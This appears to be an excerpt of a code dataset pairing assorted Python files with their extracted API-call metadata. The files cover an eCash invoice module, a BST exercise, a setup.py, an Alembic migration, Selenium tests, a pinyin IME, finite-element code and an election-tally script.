# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import annotations
import json
from dataclasses import dataclass
from decimal import Decimal
from typing import Dict, List, Optional, Sequence, Union
from urllib.request import urlopen
from .address import Address, AddressError
class InvoiceDataError(Exception):
pass
class Invoice:
def __init__(
self,
address: Address,
amount: Decimal,
label: str = "",
currency: str = "XEC",
exchange_rate: Optional[Union[FixedExchangeRate, ExchangeRateApi]] = None,
):
self.address = address
self.amount = amount
self.currency = currency
self.label = label
if currency.lower() != "xec" and exchange_rate is None:
raise InvoiceDataError("No exchange rate specified for non-XEC amount.")
self.exchange_rate = exchange_rate
def to_dict(self) -> dict:
out = {
"invoice": {
"address": self.address.to_ui_string(),
"label": self.label,
"amount": str(self.amount),
"currency": self.currency,
}
}
if self.exchange_rate is None:
return out
if isinstance(self.exchange_rate, FixedExchangeRate):
out["invoice"]["exchangeRate"] = self.exchange_rate.to_string()
return out
out["invoice"]["exchangeRateAPI"] = self.exchange_rate.to_dict()
return out
@classmethod
def from_dict(cls, data: dict) -> Invoice:
"""Build an invoice from a dict."""
if "invoice" not in data:
raise InvoiceDataError("Missing top-level invoice node.")
invoice = data["invoice"]
currency = invoice.get("currency") or "XEC"
try:
address = Address.from_string(invoice["address"])
except (KeyError, AddressError):
raise InvoiceDataError("Missing or invalid payment address.")
if "exchangeRate" in invoice and "exchangeRateAPI" in invoice:
raise InvoiceDataError(
"Ambiguous exchange rate data (both fixed and API rates are present)"
)
if currency.lower() == "xec" and (
"exchangeRate" in invoice or "exchangeRateAPI" in invoice
):
raise InvoiceDataError(
"Exchange rate must not be specified for XEC amounts"
)
rate = None
if "exchangeRate" in invoice:
rate = FixedExchangeRate(Decimal(invoice["exchangeRate"]))
elif "exchangeRateAPI" in invoice:
rate = ExchangeRateApi(
url=invoice["exchangeRateAPI"].get("url") or "",
keys=invoice["exchangeRateAPI"].get("keys") or [],
)
return Invoice(
address=address,
amount=Decimal(invoice.get("amount", "0.")),
label=invoice.get("label", ""),
currency=currency,
exchange_rate=rate,
)
@classmethod
def from_file(cls, filename: str) -> Invoice:
with open(filename, "r") as f:
data = json.load(f)
return Invoice.from_dict(data)
def get_xec_amount(self) -> Decimal:
if self.exchange_rate is None:
assert self.currency.lower() == "xec"
return self.amount
rate = self.exchange_rate.get_exchange_rate()
assert rate != 0
return self.amount / rate
@dataclass
class FixedExchangeRate:
rate: Decimal
def to_string(self) -> str:
return str(self.rate)
def get_exchange_rate(self) -> Decimal:
return self.rate
@dataclass
class ExchangeRateApi:
"""Data defining an API call to fetch an exchange rate.
The data return by the url is assumed to be JSON, and the keys are used in the
JSON data to find the node containing the exchange rate."""
url: str
keys: List[str]
def to_dict(self) -> Dict[str, Union[str, List[str]]]:
return {"url": self.url, "keys": self.keys}
def get_exchange_rate(self) -> Decimal:
with urlopen(self.url) as response:
body = response.read()
json_data = json.loads(body)
next_node = json_data
for k in self.keys:
next_node = next_node[k]
return Decimal(next_node)
@dataclass
class MultiCurrencyExchangeRateApi:
"""This object is similar to APIExchangeRate, with the notable difference
that both the URL and keys can contain a placeholder string for a currency symbol
(USD, EUR...).
The supported placeholders are "%cur%" and "%CUR%". They are to be replaced
respectively by the lowercase (usd, eur...) and uppercase (USD, EUR...) currency
symbols.
"""
url: str
keys: Sequence[str]
def get_url(self, currency: str) -> str:
"""Get request url with occurrences of %cur% and %CUR% replaced with
respectively lower case or upper case currency symbol.
"""
url = self.url.replace("%cur%", currency.lower())
return url.replace("%CUR%", currency.upper())
def get_keys(self, currency: str) -> List[str]:
"""Get keys with occurrences of %cur% and %CUR% replaced with
respectively lower case or upper case currency symbol.
"""
return [
k.replace("%cur%", currency.lower()).replace("%CUR%", currency.upper())
for k in self.keys
]
def get_exchange_rate(self, currency: str) -> Decimal:
url = self.get_url(currency)
keys = self.get_keys(currency)
return ExchangeRateApi(url, keys).get_exchange_rate()
APIS: List[MultiCurrencyExchangeRateApi] = [
MultiCurrencyExchangeRateApi(
"https://api.coingecko.com/api/v3/simple/price?ids=ecash&vs_currencies=%cur%",
["ecash", "%cur%"],
),
MultiCurrencyExchangeRateApi(
"https://api.coingecko.com/api/v3/coins/ecash?localization=False&sparkline=false",
["market_data", "current_price", "%cur%"],
),
MultiCurrencyExchangeRateApi(
"https://api.binance.com/api/v3/avgPrice?symbol=XECUSDT",
["price"],
),
MultiCurrencyExchangeRateApi(
"https://api.binance.com/api/v3/avgPrice?symbol=XECBUSD",
["price"],
),
]
|
[
"json.load",
"json.loads",
"urllib.request.urlopen",
"decimal.Decimal"
] |
[((5454, 5472), 'decimal.Decimal', 'Decimal', (['next_node'], {}), '(next_node)\n', (5461, 5472), False, 'from decimal import Decimal\n'), ((4272, 4284), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4281, 4284), False, 'import json\n'), ((5236, 5253), 'urllib.request.urlopen', 'urlopen', (['self.url'], {}), '(self.url)\n', (5243, 5253), False, 'from urllib.request import urlopen\n'), ((5326, 5342), 'json.loads', 'json.loads', (['body'], {}), '(body)\n', (5336, 5342), False, 'import json\n'), ((3659, 3691), 'decimal.Decimal', 'Decimal', (["invoice['exchangeRate']"], {}), "(invoice['exchangeRate'])\n", (3666, 3691), False, 'from decimal import Decimal\n')]
|
# Given a sorted (increasing order) array with unique integer elements, write an algorithm to create a binary search tree with minimal height.
from utils import Node
def minimal_tree(arr):
if len(arr) == 0:
return None
mid = len(arr) // 2
current = Node(arr[mid])
current.left = minimal_tree(arr[:mid])
current.right = minimal_tree(arr[mid + 1:])
return current.value # Can just print the current node as a whole
tester = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
print(minimal_tree(tester))
|
[
"utils.Node"
] |
[((281, 295), 'utils.Node', 'Node', (['arr[mid]'], {}), '(arr[mid])\n', (285, 295), False, 'from utils import Node\n')]
|
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "setlr",
version = "0.2.16",
author = "<NAME>",
author_email = "<EMAIL>",
description = ("setlr is a tool for Semantic Extraction, Transformation, and Loading."),
license = "Apache License 2.0",
keywords = "rdf semantic etl",
url = "http://packages.python.org/setlr",
packages=['setlr'],
long_description='''SETLr is a tool for generating RDF graphs, including named graphs, from almost any kind of tabular data.''',
include_package_data = True,
install_requires = [
'future',
'pip>=9.0.0',
'cython',
'numpy',
'rdflib>=6.0.0',
'pandas>=0.23.0',
'requests',
'toposort',
'beautifulsoup4',
'jinja2',
'lxml',
'six',
'xlrd',
'ijson',
'requests-testadapter',
'python-slugify',
],
entry_points = {
'console_scripts': ['setlr=setlr:main'],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
)
|
[
"os.path.dirname",
"setuptools.setup"
] |
[((368, 1277), 'setuptools.setup', 'setup', ([], {'name': '"""setlr"""', 'version': '"""0.2.16"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'description': '"""setlr is a tool for Semantic Extraction, Transformation, and Loading."""', 'license': '"""Apache License 2.0"""', 'keywords': '"""rdf semantic etl"""', 'url': '"""http://packages.python.org/setlr"""', 'packages': "['setlr']", 'long_description': '"""SETLr is a tool for generating RDF graphs, including named graphs, from almost any kind of tabular data."""', 'include_package_data': '(True)', 'install_requires': "['future', 'pip>=9.0.0', 'cython', 'numpy', 'rdflib>=6.0.0',\n 'pandas>=0.23.0', 'requests', 'toposort', 'beautifulsoup4', 'jinja2',\n 'lxml', 'six', 'xlrd', 'ijson', 'requests-testadapter', 'python-slugify']", 'entry_points': "{'console_scripts': ['setlr=setlr:main']}", 'classifiers': "['Development Status :: 5 - Production/Stable', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License']"}), "(name='setlr', version='0.2.16', author='<NAME>', author_email=\n '<EMAIL>', description=\n 'setlr is a tool for Semantic Extraction, Transformation, and Loading.',\n license='Apache License 2.0', keywords='rdf semantic etl', url=\n 'http://packages.python.org/setlr', packages=['setlr'],\n long_description=\n 'SETLr is a tool for generating RDF graphs, including named graphs, from almost any kind of tabular data.'\n , include_package_data=True, install_requires=['future', 'pip>=9.0.0',\n 'cython', 'numpy', 'rdflib>=6.0.0', 'pandas>=0.23.0', 'requests',\n 'toposort', 'beautifulsoup4', 'jinja2', 'lxml', 'six', 'xlrd', 'ijson',\n 'requests-testadapter', 'python-slugify'], entry_points={\n 'console_scripts': ['setlr=setlr:main']}, classifiers=[\n 'Development Status :: 5 - Production/Stable', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'])\n", (373, 1277), False, 'from setuptools import setup, find_packages\n'), ((325, 350), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (340, 350), False, 'import os\n')]
|
from os import listdir
from os.path import join
import ijson
from brix.settings import *
csv_file = open(CSV, 'w')
writer = csv.writer(csv_file, delimiter=DELIMITER, quotechar=QUOTECHAR, quoting=QUOTING)
writer.writerow(COLUMNS)
jsons = [f for f in listdir(DIR) if f.endswith('.json')]
i = 0
count = len(jsons)
for fn in sorted(jsons):
i += 1
print('Open file: %s (%d of %d)...' % (fn, i, count))
f = join(DIR, fn)
with open(f, 'r') as json:
objects = ijson.items(json, 'detections.item')
j = 0
for o in objects:
j += 1
if j % 10000 == 0:
print('...processed %d hits' % j)
user_id = o.get('user_id')
if int(user_id) != CREDOCUT:
continue
row = []
for c in COLUMNS:
row.append(o.get(c))
writer.writerow(row)
print('...save BRIX hit from %d device' % o.get('device_id'))
print('...finish of %s, processed %d hits' % (fn, j))
csv_file.close()
|
[
"ijson.items",
"os.path.join",
"os.listdir"
] |
[((421, 434), 'os.path.join', 'join', (['DIR', 'fn'], {}), '(DIR, fn)\n', (425, 434), False, 'from os.path import join\n'), ((254, 266), 'os.listdir', 'listdir', (['DIR'], {}), '(DIR)\n', (261, 266), False, 'from os import listdir\n'), ((484, 520), 'ijson.items', 'ijson.items', (['json', '"""detections.item"""'], {}), "(json, 'detections.item')\n", (495, 520), False, 'import ijson\n')]
|
"""machine events
Revision ID: 203f6105a16b
Revises: 5ff7c035ac37
Create Date: 2018-02-08 04:05:47.857990
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '203f6105a16b'
down_revision = '5ff7c035ac37'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('machine_event',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('machine_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('username', sa.String(), nullable=True),
sa.Column('date', sa.DateTime(), nullable=False),
sa.Column('event_type', sa.Integer(), nullable=False),
sa.Column('info', postgresql.JSONB(), nullable=True),
sa.ForeignKeyConstraint(['machine_id'], ['machine.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ondelete='SET NULL'),
sa.PrimaryKeyConstraint('id')
)
op.add_column('console_token', sa.Column('machine_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'console_token', 'machine', ['machine_id'], ['id'], ondelete='CASCADE')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'console_token', type_='foreignkey')
op.drop_column('console_token', 'machine_id')
op.drop_table('machine_event')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"sqlalchemy.DateTime",
"alembic.op.create_foreign_key",
"sqlalchemy.PrimaryKeyConstraint",
"alembic.op.drop_constraint",
"alembic.op.drop_column",
"sqlalchemy.dialects.postgresql.JSONB",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1140, 1244), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""console_token"""', '"""machine"""', "['machine_id']", "['id']"], {'ondelete': '"""CASCADE"""'}), "(None, 'console_token', 'machine', ['machine_id'], [\n 'id'], ondelete='CASCADE')\n", (1161, 1244), False, 'from alembic import op\n'), ((1364, 1425), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""console_token"""'], {'type_': '"""foreignkey"""'}), "(None, 'console_token', type_='foreignkey')\n", (1382, 1425), False, 'from alembic import op\n'), ((1430, 1475), 'alembic.op.drop_column', 'op.drop_column', (['"""console_token"""', '"""machine_id"""'], {}), "('console_token', 'machine_id')\n", (1444, 1475), False, 'from alembic import op\n'), ((1480, 1510), 'alembic.op.drop_table', 'op.drop_table', (['"""machine_event"""'], {}), "('machine_event')\n", (1493, 1510), False, 'from alembic import op\n'), ((854, 929), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['machine_id']", "['machine.id']"], {'ondelete': '"""CASCADE"""'}), "(['machine_id'], ['machine.id'], ondelete='CASCADE')\n", (877, 929), True, 'import sqlalchemy as sa\n'), ((935, 1005), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {'ondelete': '"""SET NULL"""'}), "(['user_id'], ['user.id'], ondelete='SET NULL')\n", (958, 1005), True, 'import sqlalchemy as sa\n'), ((1011, 1040), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1034, 1040), True, 'import sqlalchemy as sa\n'), ((480, 492), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (490, 492), True, 'import sqlalchemy as sa\n'), ((539, 551), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (549, 551), True, 'import sqlalchemy as sa\n'), ((594, 606), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (604, 606), True, 'import sqlalchemy as sa\n'), ((650, 661), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (659, 661), True, 'import sqlalchemy as sa\n'), ((701, 714), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (712, 714), True, 'import sqlalchemy as sa\n'), ((761, 773), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (771, 773), True, 'import sqlalchemy as sa\n'), ((814, 832), 'sqlalchemy.dialects.postgresql.JSONB', 'postgresql.JSONB', ([], {}), '()\n', (830, 832), False, 'from sqlalchemy.dialects import postgresql\n'), ((1106, 1118), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1116, 1118), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# @Time : 2022/3/19 8:17 上午
# @Author : Kevin
# @File : search_test.py
# @Software: PyCharm
from selenium import webdriver
import pytest
import time
key_words = ["Hogwarts"]
class TestSearch:
def setup(self):
self.start_time = time.time()
chromedriver = "auto_web/driver/chromedriver"
self.driver = webdriver.Chrome(executable_path=chromedriver)
@pytest.mark.parametrize("search_key", key_words, ids=[f"搜寻_{i}" for i in key_words])
def test_search(self, search_key):
self.driver.get("https:www.baidu.com/")
self.driver.find_element_by_id("kw").send_keys(search_key)
self.driver.find_element_by_id("su").click()
result = self.driver.page_source
assert search_key in result
def teardown(self):
print("本次case的使用时间:", time.time() - self.start_time)
self.driver.quit()
|
[
"pytest.mark.parametrize",
"selenium.webdriver.Chrome",
"time.time"
] |
[((408, 496), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""search_key"""', 'key_words'], {'ids': "[f'搜寻_{i}' for i in key_words]"}), "('search_key', key_words, ids=[f'搜寻_{i}' for i in\n key_words])\n", (431, 496), False, 'import pytest\n'), ((267, 278), 'time.time', 'time.time', ([], {}), '()\n', (276, 278), False, 'import time\n'), ((355, 401), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'executable_path': 'chromedriver'}), '(executable_path=chromedriver)\n', (371, 401), False, 'from selenium import webdriver\n'), ((846, 857), 'time.time', 'time.time', ([], {}), '()\n', (855, 857), False, 'import time\n')]
|
import json
import math
import sys
from config import config
from loaddict import load_dict
TOP_K = 5
pinyin_dic, freq_dict, trans_dict, emit_dict, bi_freq_dict, trip_dict = load_dict(
triple=True)
def get_value_one_wrap(Dict, key, default_val=1e-40):
if key not in Dict:
return default_val
else:
return Dict[key]
def get_value_two_wrap(Dict, firstkey, secndkey, default_val=1e-150):
# this function can process both trans and emit probability
# trans_dict map each char to a dict, the dict map
if firstkey not in Dict:
return default_val
else:
return get_value_one_wrap(Dict[firstkey], secndkey)
def score_triple(Dict, bichars, thirdchar):
if bichars not in Dict:
return get_value_two_wrap(trans_dict, bichars[1], thirdchar) * 1e-25
else:
if thirdchar == 'bifreq':
return bi_freq_dict[bichars]
if thirdchar not in Dict[bichars]:
return (0.1) * (get_value_two_wrap(trans_dict, bichars[1], thirdchar))
else:
return get_value_two_wrap(Dict, bichars, thirdchar)
def triviterbi(List):
# because we need to use List[0] and List[1] in the following, make sure
# length >= 2
if len(List) < 2:
print('single pinyin input')
return None
V = list()
for _ in range(len(List)):
V.append(dict())
prelist = pinyin_dic[List[0]]
curlist = pinyin_dic[List[1]]
for curchar in curlist:
for prechar in prelist:
V[1][prechar + curchar] = list()
# the 0 layer is left empty
# V[][] is used for storing path and its score
# multiply the score of triple(means the frequency of bi-chars)
# with the transition probability between first and second char
score = math.log(score_triple(trip_dict, prechar + curchar, 'bifreq')) + \
math.log(get_value_two_wrap(trans_dict, prechar, curchar))
path = [prechar, curchar]
# V[1][prechar + curchar] = list()
V[1][prechar + curchar].append((path, score))
for layer in range(2, len(List)):
# first layer in the consecutive 3 layers
fstlayer = prelist
prelist = curlist
curlist = pinyin_dic[List[layer]]
for curnode in curlist:
topK = list()
for sndnode in prelist:
V[layer][sndnode + curnode] = list()
waitinglist = list()
for fstnode in fstlayer:
# loop over the candidate nodes
try:
for i in range(0, len(V[layer - 1][fstnode + sndnode])):
score = V[layer - 1][fstnode + sndnode][i][1] + \
math.log(score_triple(trip_dict, fstnode + sndnode, curnode)) + \
1.5 * \
math.log(get_value_two_wrap(
emit_dict, curnode, List[layer]))
waitinglist.append(
(V[layer-1][fstnode + sndnode][i][0], fstnode+sndnode, score))
except Exception as e:
print(e)
# high scores first
topK = sorted(
waitinglist, key=lambda elem: elem[2], reverse=True)
for i in range(0, min(len(topK), TOP_K)):
# append path + its_score
newpath = topK[i][0].copy()
newpath.append(curnode)
V[layer][sndnode + curnode].append((newpath, topK[i][2]))
return V
def trisearch(V, List):
if len(List) < 2:
return [('Too short pinyin', 0)]
possibles = list()
for key in V[-1]:
for item in V[-1][key]:
possibles.append(item)
sorted_path_score = sorted(
possibles, key=lambda item: item[1], reverse=True)
ResK = list()
for i in range(TOP_K):
charline = ''.join(sorted_path_score[i][0])
ResK.append((charline, sorted_path_score[i][1]))
return ResK
'''
print('Loaded, please input...')
line = 'wo ai zu guo'
line = line.replace("\n", "")
line = line.replace("qv", "qu")
line = line.replace("xv", "xu")
line = line.replace("jv", "ju")
line = line.lower()
pyl = line.split()
chinese = trisearch(triviterbi(pyl), pyl)
print(chinese)
print('please input pinyin line\n')
s = ''
while s != 'exit':
s = input()
if s == 'exit':
sys.exit(0)
try:
s = s.replace('\n', '')
s = s.strip()
s = s.lower()
s = s.split()
print(trisearch(triviterbi(s), s))
except:
print('again')
sys.exit(0)
'''
|
[
"loaddict.load_dict"
] |
[((188, 210), 'loaddict.load_dict', 'load_dict', ([], {'triple': '(True)'}), '(triple=True)\n', (197, 210), False, 'from loaddict import load_dict\n')]
|
import unittest
import numpy as np
import pandas as pd
import os
import pytz
from clairvoyant import History
dir_path = os.path.dirname(os.path.realpath(__file__))
class Test_History(unittest.TestCase):
def setUp(self):
column_map = {
'Date': 'Unnamed: 0', 'Open': 'open', 'High': 'high', 'Low': 'low',
'Close': 'close', 'Volume': 'volume', 'Sentiment': 'sentiment',
'Influence': 'influence'
}
self.sample = History(
os.path.join(dir_path, 'tsla-sentiment.csv'), col_map=column_map
)
def test_get_data(self):
data = self.sample
self.assertTrue(isinstance(data._df, pd.DataFrame))
# KeyError happens if the column doesn't exist.
self.assertRaises(KeyError, data.__getitem__, 'Blah')
# You can get a column by name, returns a series.
self.assertTrue(isinstance(data['Close'], pd.Series))
# You can get a column by attribute, returns a series.
self.assertTrue(isinstance(data.close, pd.Series))
def test_rename(self):
data = self.sample
data.rename(columns={'date': 'Date', 'close': 'Close'})
self.assertEqual(data._col_map['Date'], 'Date')
self.assertEqual(data._col_map['Close'], 'Close')
self.assertTrue(isinstance(data.date, pd.Series))
self.assertTrue(isinstance(data.close, pd.Series))
def test_iteration(self):
data = self.sample
count = 0
for i in data:
count += 1
print(count)
self.assertEqual(count, 232)
def test_slicing_with_dates(self):
data = self.sample
tz = data._timezone
start = tz.localize(pd.to_datetime('2017-02-24 06:30:00'))
end = tz.localize(pd.to_datetime('2017-02-24 07:00:00'))
# slicing produces a new History object
cpy = data[start:end]
self.assertEqual(cpy.date.iloc[0], '2017-02-24 06:30:00')
self.assertEqual(cpy.date.iloc[-1], '2017-02-24 07:00:00')
# renaming will change the namedtuple attributes
data.rename(columns={'date': 'mydate'})
for row in data[start:end]:
self.assertTrue(hasattr(row, 'mydate'))
self.assertFalse(hasattr(row, 'date'))
def test_slicing_with_integers(self):
data = self.sample
# can also slice by integer index
for row in data[0:3]:
self.assertTrue(isinstance(row, tuple))
self.assertTrue(hasattr(row, 'date'))
def test_len(self):
data = self.sample
self.assertEqual(len(data), 232)
def test_features(self):
data = self.sample
self.assertEqual(data.features, ['Sentiment', 'Influence'])
data.features = ['Volume']
self.assertEqual(data.features, ['Volume'])
self.assertRaises(KeyError, setattr, data, 'features', ['test'])
def test_getting_rows(self):
data = self.sample
print(data[-1])
# You can get by index, returns a series
self.assertTrue(isinstance(data[0], pd.Series))
self.assertEqual(data.date.iloc[-1], '2017-03-10 13:00:00')
print(data['2017-03-10 13:00:00'])
# You can also get by date, returns a dataframe
self.assertTrue(isinstance(data['2017-03-10 13:00:00'], pd.DataFrame))
self.assertEqual(data['2017-03-10 13:00:00'].index[0], 231)
def test_rate_of_return(self):
data = self.sample
self.assertTrue(np.isclose(
data.return_rate[1], -0.00061491160645644951)
)
|
[
"os.path.realpath",
"pandas.to_datetime",
"os.path.join",
"numpy.isclose"
] |
[((136, 162), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (152, 162), False, 'import os\n'), ((499, 543), 'os.path.join', 'os.path.join', (['dir_path', '"""tsla-sentiment.csv"""'], {}), "(dir_path, 'tsla-sentiment.csv')\n", (511, 543), False, 'import os\n'), ((1708, 1745), 'pandas.to_datetime', 'pd.to_datetime', (['"""2017-02-24 06:30:00"""'], {}), "('2017-02-24 06:30:00')\n", (1722, 1745), True, 'import pandas as pd\n'), ((1773, 1810), 'pandas.to_datetime', 'pd.to_datetime', (['"""2017-02-24 07:00:00"""'], {}), "('2017-02-24 07:00:00')\n", (1787, 1810), True, 'import pandas as pd\n'), ((3482, 3537), 'numpy.isclose', 'np.isclose', (['data.return_rate[1]', '(-0.0006149116064564495)'], {}), '(data.return_rate[1], -0.0006149116064564495)\n', (3492, 3537), True, 'import numpy as np\n')]
|
# importando SQLite
import sqlite3 as lite
# criando conexão / criando novo BD
con = lite.connect('livraria.db')
'''
# inserindo dados
with con:
cur = con.cursor()
cur.execute("INSERT INTO Categoria (nome) VALUES ('Romance') ")
cur.execute("INSERT INTO Categoria (nome) VALUES ('Drama') ")
cur.execute("INSERT INTO Categoria (nome) VALUES ('Aventura') ")
cur.execute("INSERT INTO Categoria (nome) VALUES ('Terror') ")
cur.execute("INSERT INTO Categoria (nome) VALUES ('Comedia') ")
'''
# inserindo update
valores = [1]
with con:
cur = con.cursor()
query = "DELETE FROM Livro WHERE id=?"
cur.execute(query, valores)
cur = con.cursor()
cur.execute("SELECT * FROM Livro")
print(cur.fetchall())
|
[
"sqlite3.connect"
] |
[((86, 113), 'sqlite3.connect', 'lite.connect', (['"""livraria.db"""'], {}), "('livraria.db')\n", (98, 113), True, 'import sqlite3 as lite\n')]
|
import numpy as np
numNodes = 891
coord = np.zeros((numNodes,2))
K = np.zeros((numNodes*2,numNodes*2))
for i in range(numNodes):
coord[i,0] = int(i / 11) / 10
coord[i,1] = i % 11 / 10
gaussxi = np.array([-1,1,1,-1]) / np.sqrt(3)
gausseta = np.array([-1,-1,1,1]) / np.sqrt(3)
numEle = 800
E = 1e5
nu = 0.25
D = E / (1 - nu**2)*np.array([[1,nu,0],[nu,1,0],[0,0,(1-nu)/2]])
for e in range(numEle):
Ke = np.zeros((8,8))
start = int((e // 10) * 11 + e % 10)
xe = np.zeros((4,2))
xe[0,:] = coord[start,:]
xe[1,:] = coord[start+11,:]
xe[2,:] = coord[start+12,:]
xe[3,:] = coord[start+1,:]
for igauss in range(4):
xi = gaussxi[igauss]
eta = gausseta[igauss]
Jpar = np.zeros((2,4))
Jpar[0,0] = -(1 - eta)/4
Jpar[0,1] = (1 - eta)/4
Jpar[0,2] = (1 + eta)/4
Jpar[0,3] = -(1 + eta)/4
Jpar[1,0] = -(1 - xi)/4
Jpar[1,1] = -(1 + xi)/4
Jpar[1,2] = (1 + xi)/4
Jpar[1,3] = (1 - xi)/4
J = np.dot(Jpar,xe)
Jinv = np.linalg.inv(J)
Npar = np.zeros((2,4))
B = np.zeros((3,8))
for i in range(4):
Npar[0,i] = Jinv[0,0] * Jpar[0,i] + Jinv[0,1] * Jpar[1,i]
Npar[1,i] = Jinv[1,0] * Jpar[0,i] + Jinv[1,1] * Jpar[1,i]
B[0,2*i] = Npar[0,i]
B[1,2*i+1] = Npar[1,i]
B[2,2*i] = Npar[1,i]
B[2,2*i+1] = Npar[0,i]
temp = np.dot(np.transpose(B),D)
detJ = np.linalg.det(J)
Ke = Ke + np.dot(temp,B)*detJ
|
[
"numpy.zeros",
"numpy.transpose",
"numpy.linalg.det",
"numpy.array",
"numpy.linalg.inv",
"numpy.dot",
"numpy.sqrt"
] |
[((43, 66), 'numpy.zeros', 'np.zeros', (['(numNodes, 2)'], {}), '((numNodes, 2))\n', (51, 66), True, 'import numpy as np\n'), ((70, 108), 'numpy.zeros', 'np.zeros', (['(numNodes * 2, numNodes * 2)'], {}), '((numNodes * 2, numNodes * 2))\n', (78, 108), True, 'import numpy as np\n'), ((208, 232), 'numpy.array', 'np.array', (['[-1, 1, 1, -1]'], {}), '([-1, 1, 1, -1])\n', (216, 232), True, 'import numpy as np\n'), ((232, 242), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (239, 242), True, 'import numpy as np\n'), ((254, 278), 'numpy.array', 'np.array', (['[-1, -1, 1, 1]'], {}), '([-1, -1, 1, 1])\n', (262, 278), True, 'import numpy as np\n'), ((278, 288), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (285, 288), True, 'import numpy as np\n'), ((341, 397), 'numpy.array', 'np.array', (['[[1, nu, 0], [nu, 1, 0], [0, 0, (1 - nu) / 2]]'], {}), '([[1, nu, 0], [nu, 1, 0], [0, 0, (1 - nu) / 2]])\n', (349, 397), True, 'import numpy as np\n'), ((420, 436), 'numpy.zeros', 'np.zeros', (['(8, 8)'], {}), '((8, 8))\n', (428, 436), True, 'import numpy as np\n'), ((486, 502), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {}), '((4, 2))\n', (494, 502), True, 'import numpy as np\n'), ((729, 745), 'numpy.zeros', 'np.zeros', (['(2, 4)'], {}), '((2, 4))\n', (737, 745), True, 'import numpy as np\n'), ((1031, 1047), 'numpy.dot', 'np.dot', (['Jpar', 'xe'], {}), '(Jpar, xe)\n', (1037, 1047), True, 'import numpy as np\n'), ((1062, 1078), 'numpy.linalg.inv', 'np.linalg.inv', (['J'], {}), '(J)\n', (1075, 1078), True, 'import numpy as np\n'), ((1094, 1110), 'numpy.zeros', 'np.zeros', (['(2, 4)'], {}), '((2, 4))\n', (1102, 1110), True, 'import numpy as np\n'), ((1122, 1138), 'numpy.zeros', 'np.zeros', (['(3, 8)'], {}), '((3, 8))\n', (1130, 1138), True, 'import numpy as np\n'), ((1525, 1541), 'numpy.linalg.det', 'np.linalg.det', (['J'], {}), '(J)\n', (1538, 1541), True, 'import numpy as np\n'), ((1491, 1506), 'numpy.transpose', 'np.transpose', (['B'], {}), '(B)\n', (1503, 1506), True, 'import numpy as np\n'), ((1560, 1575), 'numpy.dot', 'np.dot', (['temp', 'B'], {}), '(temp, B)\n', (1566, 1575), True, 'import numpy as np\n')]
|
import os
import csv
votesCast = []
Khan = []
Correy = []
Li = []
O_Tooley = []
electionData_csv = os.path.join("Resources","election_data.csv")
with open(electionData_csv, 'r') as csvfile:
next(csvfile)
csvreader = csv.reader(csvfile, delimiter=',')
for row in csvreader:
votesCast.append(row[2])
#tally Kahn votes
if str(row[2]) == "Khan":
Khan.append(row[2])
#tally Correy votes
if str(row[2]) == "Correy":
Correy.append(row[2])
#tally Li votes
if str(row[2]) == "Li":
Li.append(row[2])
#tally O'Toole votes
if str(row[2]) == "O'Tooley":
O_Tooley.append(row[2])
#count the total number of votes cast
totalVotes = len(votesCast)
#calculate Kahn's vote precentage
totalKhan = len(Khan)
KhanPer = round(((totalKhan) / (totalVotes) *100))
#calculate Correy's vote precentage
totalCorrey = len(Correy)
CorreyPer = round(((totalCorrey) / (totalVotes) *100))
#calculate Li's vote precentage
totalLi = len(Li)
